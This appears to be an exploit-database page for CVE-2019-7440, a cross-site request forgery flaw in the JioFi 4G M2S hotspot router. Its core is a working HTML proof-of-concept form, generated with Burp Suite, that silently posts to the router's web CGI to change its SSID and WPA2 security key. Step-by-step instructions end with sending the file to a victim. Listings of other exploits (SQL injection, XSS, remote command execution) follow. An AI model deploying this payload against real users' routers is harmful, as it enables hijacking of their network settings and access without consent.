Search for hundreds of thousands of exploits

"JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery"

Author

Exploit author

"Vikas Chaudhary"

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-04-02

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# Exploit Title: JioFi 4G M2S 1.0.2 devices have CSRF via the SSID name and Security Key field under Edit Wi-Fi Settings (aka a SetWiFi_Setting request to cgi-bin/qcmap_web_cgi)
# Exploit Author:  Vikas Chaudhary
# Date: 21-01-2019
# Vendor Homepage: https://www.jio.com/
# Hardware Link:  https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
# Category: Hardware
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web:  https://gkaim.com/
# Tested on: Windows 10 X64- Firefox-65.0
# CVE-2019-7440
***********************************************************************
## Vulnerability Description :- The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. 
 The issue is triggered when an unauthorized input passed via multiple POST and GET parameters are not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.
----------------------------------------
# Proof Of Concept:-PoC
1- First Open BurpSuite
2- Make Intercept on 
3 -Go to your Wifi Router's  Gateway in Browser  [i.e http://192.168.225.1 ]
4-Goto wifi edit section and click on apply 
5-Now capture the data and generate CSRF PoC
6-Now Change the SSID name and Password (Security Key) According to you 
7-Save it as .html and send it to Victim.
8-Victim's profile will be changed according to you
-------------------

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.225.1/cgi-bin/qcmap_web_cgi" method="POST">
      <input type="hidden" name="Page" value="SetWiFi&#95;Setting" />
      <input type="hidden" name="Mask" value="0" />
      <input type="hidden" name="result" value="0" />
      <input type="hidden" name="ssid" value="&#32;Myaim&#95;Vikas" />
      <input type="hidden" name="mode&#95;802&#95;11" value="11bgn" />
      <input type="hidden" name="tx&#95;power" value="HIGH" />
      <input type="hidden" name="wmm" value="Enable" />
      <input type="hidden" name="wps&#95;enable" value="PushButton" />
      <input type="hidden" name="wifi&#95;security" value="WPA2PSK" />
      <input type="hidden" name="wpa&#95;encryption&#95;type" value="AES" />
      <input type="hidden" name="wpa&#95;security&#95;key" value="12345678" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;1" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;2" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;3" value="0" />
      <input type="hidden" name="wep&#95;security&#95;key&#95;4" value="0" />
      <input type="hidden" name="wep&#95;current&#95;default&#95;key" value="0" />
      <input type="hidden" name="channel&#95;mode" value="automatic" />
      <input type="hidden" name="channel&#95;selection" value="8" />
      <input type="hidden" name="sleep&#95;mode" value="Enable" />
      <input type="hidden" name="sleep&#95;mode&#95;timer" value="30" />
      <input type="hidden" name="ssid&#95;broadcast" value="Enable" />
      <input type="hidden" name="enable&#95;wifi" value="Enable" />
      <input type="hidden" name="token" value="052d80c2c7aa1c90" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
Release DateTitleTypePlatformAuthor
2019-04-25"JioFi 4G M2S 1.0.2 - Denial of Service"doshardware"Vikas Chaudhary"
2019-04-25"JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting"webappshardware"Vikas Chaudhary"
2019-04-02"WordPress Plugin PayPal Checkout Payment Gateway 1.6.8 - Parameter Tampering"webappsphp"Vikas Chaudhary"
2019-04-02"JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery"webappshardware"Vikas Chaudhary"
2018-08-15"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)"doshardware"Vikas Chaudhary"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46633/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.